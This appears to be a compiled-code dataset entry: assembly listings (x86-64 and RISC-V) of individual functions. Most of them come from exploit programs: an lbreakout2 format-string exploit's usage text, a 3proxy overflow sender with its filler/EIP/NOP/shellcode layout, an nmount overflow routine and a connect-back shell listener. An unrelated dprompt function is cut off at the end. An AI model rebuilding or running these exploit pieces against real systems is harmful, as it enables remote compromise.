extr_22830.c_usage_aug_v3_5
.file "extr_22830.c_usage_aug_v3_5.c" .text .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC0: .ascii "[*] lbreakout[2-2.5+]: remote format string exploit.\n[*] by" .ascii ": vade79/v9 [email protected] (fakehalo)\n\n usage: %s" .ascii " [options] -h hostname\n\n options:\n -t <number>\tdefines " .ascii "the platform value.\n -h <string>\tdefines the hostname/ip " .ascii "to connect to.\n -p <number>\tdefines the port to connect t" .ascii "o.\n -d <number*4>\tdefines the offset to use. (dtors_addr)" .ascii "\n -r <number>\tdefines the offset to use. (ret_addr)\n -P" .ascii " <number>\tdefi" .string "nes alternate pop value to use.\n -g\t\tdefines pop finder mode.\n -b\t\tdefines brute force mode.\n -c\t\tdefines server crash mode.\n\n platforms:\n 0\t\tlbreaout2server v2-2.5beta1-src on RedHat 7.1. (default)\n 1\t\tlbreaout2server v2-2.5beta2-src on RedHat 7.1.\n\n" .text .p2align 4 .globl usage .type usage, @function usage: .LFB1: .cfi_startproc endbr64 subq $8, %rsp .cfi_def_cfa_offset 16 movq %rdi, %rsi leaq .LC0(%rip), %rdi call printf@PLT xorl %edi, %edi addq $8, %rsp .cfi_def_cfa_offset 8 jmp exit@PLT .cfi_endproc .LFE1: .size usage, .-usage .globl g_aug_volatile_4710 .data .align 4 .type g_aug_volatile_4710, @object .size g_aug_volatile_4710, 4 g_aug_volatile_4710: .long 9 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_22830.c_usage_aug_v3_5.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .ascii "[*] lbreakout[2-2.5+]: remote format string exploit.\n[*] by" .ascii ": vade79/v9 [email protected] (fakehalo)\n\n usage: %s" .ascii " [options] -h hostname\n\n options:\n -t <number>\tdefines " .ascii "the platform value.\n -h <string>\tdefines the hostname/ip " .ascii "to connect to.\n -p <number>\tdefines the port to connect t" .ascii "o.\n -d <number*4>\tdefines the offset to use. (dtors_addr)" .ascii "\n -r <number>\tdefines the offset to use. (ret_addr)\n -P" .ascii " <number>\tdefi" .string "nes alternate pop value to use.\n -g\t\tdefines pop finder mode.\n -b\t\tdefines brute force mode.\n -c\t\tdefines server crash mode.\n\n platforms:\n 0\t\tlbreaout2server v2-2.5beta1-src on RedHat 7.1. (default)\n 1\t\tlbreaout2server v2-2.5beta2-src on RedHat 7.1.\n\n" .text .align 1 .globl usage .type usage, @function usage: addi sp,sp,-16 mv a1,a0 lla a0,.LC0 sd ra,8(sp) call printf@plt ld ra,8(sp) li a0,0 addi sp,sp,16 tail exit@plt .size usage, .-usage .globl g_aug_volatile_4710 .data .align 2 .type g_aug_volatile_4710, @object .size g_aug_volatile_4710, 4 g_aug_volatile_4710: .word 9 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_3822.c_proxy_connect_aug_v3_8
.file "extr_3822.c_proxy_connect_aug_v3_8.c" .text .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC0: .string "[*] attempting to connect: %s:%d.\n" .section .rodata.str1.1,"aMS",@progbits,1 .LC1: .string "couldn't resolve hostname." .LC2: .string "3proxy connection failed." .section .rodata.str1.8 .align 8 .LC3: .string "[*] successfully connected: %s:%d.\n" .section .rodata.str1.1 .LC4: .string "[*] sending string:" .section .rodata.str1.8 .align 8 .LC5: .string "[+] GET /[FILLERx1064][EIP/\"CALL ESP\"][NOPSx32][SHELLCODE]\\n" .section .rodata.str1.1 .LC6: .string "[+] Host: [FILLERx999]\\n\\n" .LC7: .string "[*] closing connection.\n" .text .p2align 4 .globl proxy_connect .type proxy_connect, @function proxy_connect: .LFB1: .cfi_startproc endbr64 pushq %r14 .cfi_def_cfa_offset 16 .cfi_offset 14, -16 pushq %r13 .cfi_def_cfa_offset 24 .cfi_offset 13, -24 movq %rdi, %r13 pushq %r12 .cfi_def_cfa_offset 32 .cfi_offset 12, -32 movl %esi, %r12d pushq %rbp .cfi_def_cfa_offset 40 .cfi_offset 6, -40 movzwl %r12w, %r12d pushq %rbx .cfi_def_cfa_offset 48 .cfi_offset 3, -48 subq $32, %rsp .cfi_def_cfa_offset 80 movl IPPROTO_TCP(%rip), %edx movl SOCK_STREAM(%rip), %esi movq %fs:40, %rax movq %rax, 24(%rsp) xorl %eax, %eax movl AF_INET(%rip), %edi leaq 12(%rsp), %r14 call socket@PLT movl %r12d, %edi movl %eax, %ebp movl AF_INET(%rip), %eax movl %eax, 20(%rsp) call htons@PLT movl %r12d, %edx movq %r13, %rsi leaq .LC0(%rip), %rdi movl %eax, 16(%rsp) xorl %eax, %eax call printf@PLT movq %r13, %rdi call inet_addr@PLT movl %eax, 12(%rsp) testl %eax, %eax jne .L15 .L2: movl sig_alarm(%rip), %esi movl SIGALRM(%rip), %edi call signal@PLT movl TIMEOUT(%rip), %edi call alarm@PLT movl $12, %edx movq %r14, %rsi movl %ebp, %edi call connect@PLT testq %rax, %rax jne .L16 .L4: xorl %edi, %edi call alarm@PLT movl %r12d, %edx movq %r13, %rsi xorl %eax, %eax leaq .LC3(%rip), %rdi call printf@PLT movl $1, %edi call sleep@PLT leaq .LC4(%rip), %rdi call puts@PLT leaq .LC5(%rip), %rdi call puts@PLT leaq .LC6(%rip), %rdi call puts@PLT movl tbl(%rip), %edi movl BUFSIZE(%rip), %r12d call getbuf@PLT movl %r12d, %edx movl %ebp, %edi movl %eax, %esi call write@PLT movl $1, %edi call sleep@PLT leaq .LC7(%rip), %rdi call puts@PLT movl %ebp, %edi call close@PLT movq 24(%rsp), %rax subq %fs:40, %rax jne .L17 addq $32, %rsp .cfi_remember_state .cfi_def_cfa_offset 48 xorl %eax, %eax popq %rbx .cfi_def_cfa_offset 40 popq %rbp .cfi_def_cfa_offset 32 popq %r12 .cfi_def_cfa_offset 24 popq %r13 .cfi_def_cfa_offset 16 popq %r14 .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L15: .cfi_restore_state movq %r13, %rdi call gethostbyname@PLT movq %rax, %rbx testq %rax, %rax je .L18 .L3: leaq 12(%rsp), %r14 movq (%rbx), %rsi movl $4, %edx movq %r14, %rdi call memcpy@PLT jmp .L2 .p2align 4,,10 .p2align 3 .L16: movl $1, %esi leaq .LC2(%rip), %rdi call printe@PLT jmp .L4 .p2align 4,,10 .p2align 3 .L18: movl $1, %esi leaq .LC1(%rip), %rdi call printe@PLT jmp .L3 .L17: call __stack_chk_fail@PLT .cfi_endproc .LFE1: .size proxy_connect, .-proxy_connect .globl tbl .bss .align 4 .type tbl, @object .size tbl, 4 tbl: .zero 4 .globl sig_alarm .align 4 .type sig_alarm, @object .size sig_alarm, 4 sig_alarm: .zero 4 .globl TIMEOUT .align 4 .type TIMEOUT, @object .size TIMEOUT, 4 TIMEOUT: .zero 4 .globl SOCK_STREAM .align 4 .type SOCK_STREAM, @object .size SOCK_STREAM, 4 SOCK_STREAM: .zero 4 .globl SIGALRM .align 4 .type SIGALRM, @object .size SIGALRM, 4 SIGALRM: .zero 4 .globl IPPROTO_TCP .align 4 .type IPPROTO_TCP, @object .size IPPROTO_TCP, 4 IPPROTO_TCP: .zero 4 .globl BUFSIZE .align 4 .type BUFSIZE, @object .size BUFSIZE, 4 BUFSIZE: .zero 4 .globl AF_INET .align 4 .type AF_INET, @object .size AF_INET, 4 AF_INET: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_3822.c_proxy_connect_aug_v3_8.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "[*] attempting to connect: %s:%d.\n" .align 3 .LC1: .string "couldn't resolve hostname." .align 3 .LC2: .string "3proxy connection failed." .align 3 .LC3: .string "[*] successfully connected: %s:%d.\n" .align 3 .LC4: .string "[*] sending string:" .align 3 .LC5: .string "[+] GET /[FILLERx1064][EIP/\"CALL ESP\"][NOPSx32][SHELLCODE]\\n" .align 3 .LC6: .string "[+] Host: [FILLERx999]\\n\\n" .align 3 .LC7: .string "[*] closing connection.\n" .text .align 1 .globl proxy_connect .type proxy_connect, @function proxy_connect: addi sp,sp,-96 sd s0,80(sp) lla s0,.LANCHOR0 lw a2,0(s0) sd s1,72(sp) sd s3,56(sp) mv s1,a0 mv s3,a1 lw a0,8(s0) lw a1,4(s0) sd s4,48(sp) la s4,__stack_chk_guard ld a5, 0(s4) sd a5, 24(sp) li a5, 0 sd ra,88(sp) sd s2,64(sp) sd s5,40(sp) call socket@plt lw a5,8(s0) mv s2,a0 mv a0,s3 sw a5,16(sp) sext.w s3,s3 call htons@plt mv a5,a0 mv a2,s3 mv a1,s1 lla a0,.LC0 sw a5,12(sp) call printf@plt mv a0,s1 call inet_addr@plt sw a0,8(sp) addi s5,sp,8 bne a0,zero,.L15 .L2: lw a1,12(s0) lw a0,16(s0) call signal@plt lw a0,20(s0) call alarm@plt li a2,12 mv a1,s5 mv a0,s2 call connect@plt bne a0,zero,.L16 .L4: li a0,0 call alarm@plt mv a2,s3 mv a1,s1 lla a0,.LC3 call printf@plt li a0,1 call sleep@plt lla a0,.LC4 call puts@plt lla a0,.LC5 call puts@plt lla a0,.LC6 call puts@plt lw a0,24(s0) call getbuf@plt lw a2,28(s0) mv a1,a0 mv a0,s2 call write@plt li a0,1 call sleep@plt lla a0,.LC7 call puts@plt mv a0,s2 call close@plt ld a4, 24(sp) ld a5, 0(s4) xor a5, a4, a5 li a4, 0 bne a5,zero,.L17 ld ra,88(sp) ld s0,80(sp) ld s1,72(sp) ld s2,64(sp) ld s3,56(sp) ld s4,48(sp) ld s5,40(sp) li a0,0 addi sp,sp,96 jr ra .L15: mv a0,s1 call gethostbyname@plt mv s5,a0 beq a0,zero,.L18 .L3: ld a1,0(s5) addi s5,sp,8 li a2,4 mv a0,s5 call memcpy@plt j .L2 .L16: li a1,1 lla a0,.LC2 call printe@plt j .L4 .L18: li a1,1 lla a0,.LC1 call printe@plt j .L3 .L17: call __stack_chk_fail@plt .size proxy_connect, .-proxy_connect .globl tbl .globl sig_alarm .globl TIMEOUT .globl SOCK_STREAM .globl SIGALRM .globl IPPROTO_TCP .globl BUFSIZE .globl AF_INET .bss .align 3 .set .LANCHOR0,. + 0 .type IPPROTO_TCP, @object .size IPPROTO_TCP, 4 IPPROTO_TCP: .zero 4 .type SOCK_STREAM, @object .size SOCK_STREAM, 4 SOCK_STREAM: .zero 4 .type AF_INET, @object .size AF_INET, 4 AF_INET: .zero 4 .type sig_alarm, @object .size sig_alarm, 4 sig_alarm: .zero 4 .type SIGALRM, @object .size SIGALRM, 4 SIGALRM: .zero 4 .type TIMEOUT, @object .size TIMEOUT, 4 TIMEOUT: .zero 4 .type tbl, @object .size tbl, 4 tbl: .zero 4 .type BUFSIZE, @object .size BUFSIZE, 4 BUFSIZE: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_14003.c_main_aug_v3_4
.file "extr_14003.c_main_aug_v3_4.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "fstype" .LC1: .string "fspath" .LC2: .string "fh" .LC3: .string "calloc" .LC4: .string "hostname" .LC5: .string "census-labs.com" .LC6: .string "[*] calling nmount()" .LC7: .string "[!] nmount error: %d\n" .LC8: .string "nmount" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC9: .string "[*] unmounting and deleting %s\n" .section .text.startup,"ax",@progbits .p2align 4 .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 subq $152, %rsp .cfi_def_cfa_offset 160 movq DIRPATH(%rip), %rdi movl $448, %esi movq %fs:40, %rax movq %rax, 136(%rsp) movl g_aug_volatile_4569(%rip), %eax addl $1, %eax movl %eax, g_aug_volatile_4569(%rip) call mkdir@PLT leaq .LC0(%rip), %rdi movq %rdi, (%rsp) call strlen@PLT movq FSNAME(%rip), %rdi addq $1, %rax movq %rdi, 16(%rsp) movq %rax, 8(%rsp) call strlen@PLT leaq .LC1(%rip), %rdi addq $1, %rax movq %rdi, 32(%rsp) movq %rax, 24(%rsp) call strlen@PLT movq DIRPATH(%rip), %rdi addq $1, %rax movq %rdi, 48(%rsp) movq %rax, 40(%rsp) call strlen@PLT leaq .LC2(%rip), %rdi addq $1, %rax movq %rdi, 64(%rsp) movq %rax, 56(%rsp) call strlen@PLT movq BUFSIZE(%rip), %rdi movl $1, %esi addq $1, %rax movq %rax, 72(%rsp) call calloc@PLT movq %rax, 80(%rsp) movq %rax, %rdi testq %rax, %rax je .L8 .L2: movq BUFSIZE(%rip), %rax movl $65, %esi leaq -1(%rax), %rdx call memset@PLT movq BUFSIZE(%rip), %rax leaq .LC4(%rip), %rdi movq %rdi, 96(%rsp) movq %rax, 88(%rsp) call strlen@PLT leaq .LC5(%rip), %rdi addq $1, %rax movq %rdi, 112(%rsp) movq %rax, 104(%rsp) call strlen@PLT leaq .LC6(%rip), %rdi addq $1, %rax movq %rax, 120(%rsp) call puts@PLT xorl %edx, %edx movq %rsp, %rdi movl $8, %esi call nmount@PLT testq %rax, %rax js .L9 .L3: movq DIRPATH(%rip), %rsi leaq .LC9(%rip), %rdi xorl %eax, %eax call printf@PLT movq DIRPATH(%rip), %rdi xorl %esi, %esi call unmount@PLT movq DIRPATH(%rip), %rdi call rmdir@PLT movq 80(%rsp), %rdi call free@PLT movq 136(%rsp), %rax subq %fs:40, %rax jne .L10 xorl %eax, %eax addq $152, %rsp .cfi_remember_state .cfi_def_cfa_offset 8 ret .L9: .cfi_restore_state movl errno(%rip), %edx movl stderr(%rip), %edi leaq .LC7(%rip), %rsi call fprintf@PLT leaq .LC8(%rip), %rdi call perror@PLT movq DIRPATH(%rip), %rdi call rmdir@PLT movq 80(%rsp), %rdi call free@PLT movl $1, %edi call exit@PLT jmp .L3 .L8: leaq .LC3(%rip), %rdi call perror@PLT movq DIRPATH(%rip), %rdi call rmdir@PLT movl EXIT_FAILURE(%rip), %edi call exit@PLT movq 80(%rsp), %rdi jmp .L2 .L10: call __stack_chk_fail@PLT .cfi_endproc .LFE0: .size main, .-main .globl stderr .bss .align 4 .type stderr, @object .size stderr, 4 stderr: .zero 4 .globl errno .align 4 .type errno, @object .size errno, 4 errno: .zero 4 .globl FSNAME .align 8 .type FSNAME, @object .size FSNAME, 8 FSNAME: .zero 8 .globl EXIT_FAILURE .align 4 .type EXIT_FAILURE, @object .size EXIT_FAILURE, 4 EXIT_FAILURE: .zero 4 .globl DIRPATH .align 8 .type DIRPATH, @object .size DIRPATH, 8 DIRPATH: .zero 8 .globl BUFSIZE .align 8 .type BUFSIZE, @object .size BUFSIZE, 8 BUFSIZE: .zero 8 .globl g_aug_volatile_4569 .data .align 4 .type g_aug_volatile_4569, @object .size g_aug_volatile_4569, 4 g_aug_volatile_4569: .long 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_14003.c_main_aug_v3_4.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "fstype" .align 3 .LC1: .string "fspath" .align 3 .LC2: .string "fh" .align 3 .LC3: .string "calloc" .align 3 .LC4: .string "hostname" .align 3 .LC5: .string "census-labs.com" .align 3 .LC6: .string "[*] calling nmount()" .align 3 .LC7: .string "[!] nmount error: %d\n" .align 3 .LC8: .string "nmount" .align 3 .LC9: .string "[*] unmounting and deleting %s\n" .section .text.startup,"ax",@progbits .align 1 .globl main .type main, @function main: addi sp,sp,-176 sd s0,160(sp) sd s1,152(sp) lla s0,.LANCHOR1 la s1,__stack_chk_guard ld a5, 0(s1) sd a5, 136(sp) li a5, 0 ld a0,0(s0) lw a5,.LANCHOR0 li a1,448 addiw a5,a5,1 sd ra,168(sp) sw a5,.LANCHOR0,a4 call mkdir@plt lla a0,.LC0 sd a0,8(sp) call strlen@plt ld a4,8(s0) addi a5,a0,1 sd a5,16(sp) mv a0,a4 sd a4,24(sp) call strlen@plt lla a4,.LC1 addi a5,a0,1 mv a0,a4 sd a5,32(sp) sd a4,40(sp) call strlen@plt ld a4,0(s0) addi a5,a0,1 sd a5,48(sp) mv a0,a4 sd a4,56(sp) call strlen@plt lla a4,.LC2 addi a5,a0,1 mv a0,a4 sd a5,64(sp) sd a4,72(sp) call strlen@plt mv a5,a0 ld a0,16(s0) addi a5,a5,1 li a1,1 sd a5,80(sp) call calloc@plt sd a0,88(sp) beq a0,zero,.L7 .L2: ld a2,16(s0) li a1,65 addi a2,a2,-1 call memset@plt ld a5,16(s0) lla a0,.LC4 sd a0,104(sp) sd a5,96(sp) call strlen@plt lla a4,.LC5 addi a5,a0,1 mv a0,a4 sd a5,112(sp) sd a4,120(sp) call strlen@plt addi a5,a0,1 lla a0,.LC6 sd a5,128(sp) call puts@plt li a2,0 li a1,8 addi a0,sp,8 call nmount@plt blt a0,zero,.L8 .L3: ld a1,0(s0) lla a0,.LC9 call printf@plt ld a0,0(s0) li a1,0 call unmount@plt ld a0,0(s0) call rmdir@plt ld a0,88(sp) call free@plt ld a4, 136(sp) ld a5, 0(s1) xor a5, a4, a5 li a4, 0 bne a5,zero,.L9 ld ra,168(sp) ld s0,160(sp) ld s1,152(sp) li a0,0 addi sp,sp,176 jr ra .L8: lw a2,28(s0) lw a0,32(s0) lla a1,.LC7 call fprintf@plt lla a0,.LC8 call perror@plt ld a0,0(s0) call rmdir@plt ld a0,88(sp) call free@plt li a0,1 call exit@plt j .L3 .L7: lla a0,.LC3 call perror@plt ld a0,0(s0) call rmdir@plt lw a0,24(s0) call exit@plt ld a0,88(sp) j .L2 .L9: call __stack_chk_fail@plt .size main, .-main .globl stderr .globl errno .globl FSNAME .globl EXIT_FAILURE .globl DIRPATH .globl BUFSIZE .globl g_aug_volatile_4569 .data .align 2 .set .LANCHOR0,. + 0 .type g_aug_volatile_4569, @object .size g_aug_volatile_4569, 4 g_aug_volatile_4569: .word 4 .bss .align 3 .set .LANCHOR1,. + 0 .type DIRPATH, @object .size DIRPATH, 8 DIRPATH: .zero 8 .type FSNAME, @object .size FSNAME, 8 FSNAME: .zero 8 .type BUFSIZE, @object .size BUFSIZE, 8 BUFSIZE: .zero 8 .type EXIT_FAILURE, @object .size EXIT_FAILURE, 4 EXIT_FAILURE: .zero 4 .type errno, @object .size errno, 4 errno: .zero 4 .type stderr, @object .size stderr, 4 stderr: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_3821.c_getshell_bind_accept_aug_v3_8
.file "extr_3821.c_getshell_bind_accept_aug_v3_8.c" .text .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC0: .string "[*] awaiting connection from: *:%d.\n" .align 8 .LC1: .string "[*] connection established. (connect-back)" .text .p2align 4 .globl getshell_bind_accept .type getshell_bind_accept, @function getshell_bind_accept: .LFB0: .cfi_startproc endbr64 pushq %r12 .cfi_def_cfa_offset 16 .cfi_offset 12, -16 movl $4, %edx xorl %esi, %esi pushq %rbp .cfi_def_cfa_offset 24 .cfi_offset 6, -24 movl %edi, %ebp subq $24, %rsp .cfi_def_cfa_offset 48 movq %fs:40, %rax movq %rax, 8(%rsp) xorl %eax, %eax leaq 4(%rsp), %r12 movl $0, (%rsp) movq %r12, %rdi call memset@PLT movl tbl(%rip), %esi xorl %eax, %eax leaq .LC0(%rip), %rdi movl $4, (%rsp) call printf@PLT movl TIMEOUT(%rip), %edi call alarm@PLT movq %r12, %rsi movq %rsp, %rdx movl %ebp, %edi call accept@PLT xorl %edi, %edi movl %eax, %r12d call alarm@PLT movl %ebp, %edi call close@PLT leaq .LC1(%rip), %rdi call puts@PLT movq 8(%rsp), %rax subq %fs:40, %rax jne .L5 addq $24, %rsp .cfi_remember_state .cfi_def_cfa_offset 24 movl %r12d, %eax popq %rbp .cfi_def_cfa_offset 16 popq %r12 .cfi_def_cfa_offset 8 ret .L5: .cfi_restore_state call __stack_chk_fail@PLT .cfi_endproc .LFE0: .size getshell_bind_accept, .-getshell_bind_accept .globl tbl .bss .align 4 .type tbl, @object .size tbl, 4 tbl: .zero 4 .globl TIMEOUT .align 4 .type TIMEOUT, @object .size TIMEOUT, 4 TIMEOUT: .zero 4 .globl g_aug_volatile_1960 .data .align 4 .type g_aug_volatile_1960, @object .size g_aug_volatile_1960, 4 g_aug_volatile_1960: .long 9 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_3821.c_getshell_bind_accept_aug_v3_8.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "[*] awaiting connection from: *:%d.\n" .align 3 .LC1: .string "[*] connection established. (connect-back)" .text .align 1 .globl getshell_bind_accept .type getshell_bind_accept, @function getshell_bind_accept: addi sp,sp,-64 sd s1,40(sp) sd s2,32(sp) mv s1,sp la s2,__stack_chk_guard li a2,4 sd s0,48(sp) li a1,0 mv s0,a0 ld a5, 0(s2) sd a5, 8(sp) li a5, 0 mv a0,s1 sd ra,56(sp) sd s3,24(sp) sw zero,4(sp) lla s3,.LANCHOR0 call memset@plt lw a1,0(s3) li a5,4 lla a0,.LC0 sw a5,4(sp) call printf@plt lw a0,4(s3) call alarm@plt mv a1,s1 addi a2,sp,4 mv a0,s0 call accept@plt mv s1,a0 li a0,0 call alarm@plt mv a0,s0 call close@plt lla a0,.LC1 call puts@plt ld a4, 8(sp) ld a5, 0(s2) xor a5, a4, a5 li a4, 0 bne a5,zero,.L5 ld ra,56(sp) ld s0,48(sp) ld s2,32(sp) ld s3,24(sp) mv a0,s1 ld s1,40(sp) addi sp,sp,64 jr ra .L5: call __stack_chk_fail@plt .size getshell_bind_accept, .-getshell_bind_accept .globl tbl .globl TIMEOUT .globl g_aug_volatile_1960 .data .align 2 .type g_aug_volatile_1960, @object .size g_aug_volatile_1960, 4 g_aug_volatile_1960: .word 9 .bss .align 3 .set .LANCHOR0,. + 0 .type tbl, @object .size tbl, 4 tbl: .zero 4 .type TIMEOUT, @object .size TIMEOUT, 4 TIMEOUT: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_dprompt.c_dprompt_add_files_aug_v3_4
.file "extr_dprompt.c_dprompt_add_files_aug_v3_4.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "\\Zn" .LC1: .string "\\Zb" .LC2: .string "" .LC3: .string " [\\Z%c%s%-*s%s%-*s\\Zn]\\n" .LC4: .string " [%-*s%s%-*s]\\n" .LC5: .string "\\Zr\\Z1" .LC6: .string "\\Zr\\Z2" .LC7: .string "%*s%3u%%%*s" .LC8: .string "\\Z%c\\Zr\\Z%c%s%s%s\\Zn" .LC9: .string "\\ZR" .LC10: .string "%s" .LC11: .string "..." .LC12: .string "%s%-*s%s %c" .LC13: .string " " .LC14: .string "%-*s%s %s" .LC15: .string " [%s]\\n" .LC16: .string " \\n" .LC17: .string "\n" .text .p2align 4 .type dprompt_add_files, @function dprompt_add_files: .LFB0: .cfi_startproc endbr64 pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 movq %rsp, %rbp .cfi_def_cfa_register 6 pushq %r15 pushq %r14 pushq %r13 pushq %r12 .cfi_offset 15, -24 .cfi_offset 14, -32 .cfi_offset 13, -40 .cfi_offset 12, -48 movl %edx, %r12d pushq %rbx .cfi_offset 3, -56 movq %rdi, %rbx subq $104, %rsp movq %rsi, -112(%rbp) movq %rsp, %rcx movq %fs:40, %rax movq %rax, -56(%rbp) xorl %eax, %eax testq %rsi, %rsi movq FALSE(%rip), %rax cmove TRUE(%rip), %rax movq %rax, -120(%rbp) movl FLABEL_MAX(%rip), %eax addl $1, %eax cltq addq $15, %rax movq %rax, %rdx andq $-4096, %rax subq %rax, %rcx andq $-16, %rdx cmpq %rcx, %rsp je .L5 .L125: subq $4096, %rsp orq $0, 4088(%rsp) cmpq %rcx, %rsp jne .L125 .L5: andl $4095, %edx subq %rdx, %rsp testq %rdx, %rdx jne .L126 .L6: movl pbar_size(%rip), %eax movq %rsp, %rsi movq %rsp, %r14 leal 16(%rax), %r15d movslq %r15d, %rdx addq $15, %rdx movq %rdx, %rdi movq %rdx, %rcx andq $-4096, %rdi andq $-16, %rcx subq %rdi, %rsi cmpq %rsi, %rsp je .L8 .L127: subq $4096, %rsp orq $0, 4088(%rsp) cmpq %rsi, %rsp jne .L127 .L8: andl $4095, %ecx subq %rcx, %rsp testq %rcx, %rcx jne .L128 .L9: movq %rdx, %rdi movq %rsp, %rsi movq %rdx, %rcx movq %rsp, -144(%rbp) andq $-4096, %rdi andq $-16, %rcx subq %rdi, %rsi cmpq %rsi, %rsp je .L11 .L129: subq $4096, %rsp orq $0, 4088(%rsp) cmpq %rsi, %rsp jne .L129 .L11: andl $4095, %ecx subq %rcx, %rsp testq %rcx, %rcx je .L12 orq $0, -8(%rsp,%rcx) .L12: movq %rdx, %rcx movq %rsp, %rsi andq $-4096, %rdx movq %rsp, -128(%rbp) subq %rdx, %rsi andq $-16, %rcx cmpq %rsi, %rsp je .L14 .L130: subq $4096, %rsp orq $0, 4088(%rsp) cmpq %rsi, %rsp jne .L130 .L14: movq %rcx, %rdx andl $4095, %edx subq %rdx, %rsp testq %rdx, %rdx je .L15 orq $0, -8(%rsp,%rdx) .L15: cmpq $0, use_colors(%rip) movq %rsp, -104(%rbp) je .L67 cmpq $0, use_shadow(%rip) je .L67 movq gauge_color(%rip), %rdx movzbl 2(%rdx), %edi movzbl (%rdx), %r13d movb %dil, -135(%rbp) .L16: movq -144(%rbp), %rdi movb $0, (%rdi) movl %eax, %edi orl %r12d, %edi js .L18 movq -112(%rbp), %rdi testq %rdi, %rdi je .L18 cmpq $0, (%rdi) jns .L20 cmpq $0, dialog_test(%rip) je .L18 .L20: leal 1(%rax), %esi movl pct_rsize(%rip), %eax leaq .LC2(%rip), %r8 movq pct_lsize(%rip), %rcx pushq %r8 movq -144(%rbp), %rdi movl %r12d, %r9d leaq .LC7(%rip), %rdx pushq %rax xorl %eax, %eax call snprintf@PLT cmpq $0, use_color(%rip) popq %r8 popq %r9 je .L18 movl pbar_size(%rip), %edx imull %r12d, %edx movslq %edx, %rax movl %edx, %esi imulq $1374389535, %rax, %rax sarl $31, %esi sarq $37, %rax subl %esi, %eax movq -144(%rbp), %rsi movl %eax, %ecx imull $100, %eax, %eax subl %eax, %edx xorl %eax, %eax cmpl $50, %edx movq -128(%rbp), %rdx setg %al subl %eax, %ecx movq -104(%rbp), %rax movb $0, (%rdx) movl dwidth(%rip), %edx movl %ecx, -132(%rbp) movb $0, (%rax) movq %rax, %rdi call strncat@PLT movslq -132(%rbp), %rax movq -104(%rbp), %rdx movq -144(%rbp), %rdi movb $0, (%rdx,%rax) movl dwidth(%rip), %edx leaq (%rdi,%rax), %rsi movq -128(%rbp), %rdi call strncat@PLT pushq -128(%rbp) movq -104(%rbp), %r9 movl %r15d, %esi leaq .LC9(%rip), %rax movq -144(%rbp), %rdi movsbl %r13b, %r8d leaq .LC8(%rip), %rdx pushq %rax movsbl -135(%rbp), %ecx xorl %eax, %eax call snprintf@PLT popq %rsi popq %rdi .p2align 4,,10 .p2align 3 .L18: testq %rbx, %rbx je .L68 movl $0, -104(%rbp) cmpl $99, %r12d movl $0, -132(%rbp) movq $0, -128(%rbp) setle -133(%rbp) .p2align 4,,10 .p2align 3 .L62: addl $1, -104(%rbp) cmpq $0, use_dialog(%rip) movl label_size(%rip), %r12d movq 8(%rbx), %r15 jne .L131 .L23: movq -128(%rbp), %rsi movq %r15, %rdi call dialog_prompt_numlines@PLT movl $1, %esi movq %r15, %rdi addl %eax, -132(%rbp) call dialog_prompt_lastline@PLT movq %rax, %r13 cmpq %rax, %r15 je .L24 movzbl (%rax), %edx movb $0, (%rax) movq %r15, %rsi leaq .LC10(%rip), %rdi xorl %eax, %eax movb %dl, -134(%rbp) call dprompt_add@PLT movzbl -134(%rbp), %edx movb %dl, 0(%r13) .L24: movq use_dialog(%rip), %rax orq use_libdialog(%rip), %rax je .L25 cmpq $0, use_color(%rip) jne .L132 .L25: movl pbar_size(%rip), %ecx testl %ecx, %ecx js .L133 .L29: leal 1(%r12), %r15d xorl %eax, %eax movq %r13, %rcx movq %r14, %rdi leaq .LC10(%rip), %rdx movl %r15d, %esi call snprintf@PLT cmpl %r12d, %eax jg .L134 .L30: cmpq %rbx, -112(%rbp) sete %r13b andb -133(%rbp), %r13b jne .L135 cmpq $0, use_color(%rip) movq %r14, %rdx movl %r12d, %esi leaq .LC0(%rip), %rax leaq .LC2(%rip), %rcx cmovne %rax, %rcx leaq .LC13(%rip), %r8 leaq .LC14(%rip), %rdi xorl %eax, %eax call dprompt_add@PLT .L34: movq 